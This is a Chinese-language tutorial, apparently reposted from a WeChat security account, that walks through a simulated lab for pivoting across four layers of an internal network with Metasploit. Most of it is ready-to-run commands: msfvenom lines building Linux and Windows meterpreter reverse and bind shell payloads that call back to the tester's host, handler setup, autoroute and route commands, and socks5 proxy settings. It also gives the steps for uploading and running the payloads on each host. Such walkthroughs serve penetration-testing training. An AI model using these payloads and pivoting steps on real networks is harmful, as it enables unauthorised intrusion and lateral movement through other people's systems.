Tips +1
上一篇我们使用了frp实现多层内网代理穿透,这篇我们使用MSF对内网四层不网络的情况下进行穿透。
模拟靶场简介
如下拓扑图,模拟真实内网多层网络渗透测试。第一层网络centos7出网,其他网络层不出网,下面我们通过msf 后渗透工具对其进行多层内网穿透。
上线第一层边界主机
1、使用MSF 马
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.1.23 lport=6666 -f elf -o test1.elf2、MSF 配置上线参数
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.23
set lport 6666
3、上传木马执行上线
4、添加192.168.22.0网段路由,开启第一个socks5代理转发
方法一:
当前会话的网段 「run get_local_subnets」 获取当前会话的网段
添加路由 「run autoroute -s 192.168.22.0/24」
查看路由是否添加 「run autoroute -p」
方法二:
也可以
通过background回到msf,使用route增加对应路由route add 1192.168.22.0 255.255.255.0 1,1是挂起的session编号。
route print
方法三:
通过msf内置模块自动添加路由
post/multi/manage/autoroute模块,设置session。
开启后,我们使用curl 加代理测试一下,代理成功
curl -x socks5://192.168.1.23 http://192.168.22.129
上线第二层网络主机
1、生成一个正向MSF 马
因为第二层网络不出网,所以我们需要使用正向连接方式让第二层主机上线MSF平台
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=7777 -f elf > test2.elf2、ssh上传文件到第二层网络主机
scp 本地文件 服务器用户名@服务器IP:服务器上传的目录
这里我们需要重新开一个msf,然后设置全局socks5 代理
setg proxies socks5:127.0.0.1:1080
setg ReverseAllowProxy true
同样的操作,添加路由,开启第二层socks5,使其可以访问第三层网络的应用
开启第二层代理后,我们客户端配置代理链进行访问
上线第三层网络主机
1、第三层网络主机不出网,同样的操作,我们生成正向连接MSF马
msfvenom -p windows/meterpreter/bind_tcp -f exe LPORT=8888 -o test3.exe
2、接着上传木马执行,成功反弹shell
4、继续添加第四层网络的路由,使其能继续渗透第四层网络。
run post/multi/manage/autoroute
run autoroute -p
上线第四层网络主机
1、第四层网络主机同样不出网,这里我们添加192.168.44.0 网段后可以访问到第四层服务,因此同样生成正向连接MSF马让它上线
msfvenom -p windows/meterpreter/bind_tcp -f exe LPORT=9999 -o test4.exe
2、设置msf 正向连接参数
3、上传MSF 马,执行上线
到此,我们完成了对四层内网的渗透。
【加入红蓝攻防成长圈,助你快速成长】
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【Tips+】内网穿透之MSF穿透内网四层网络
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论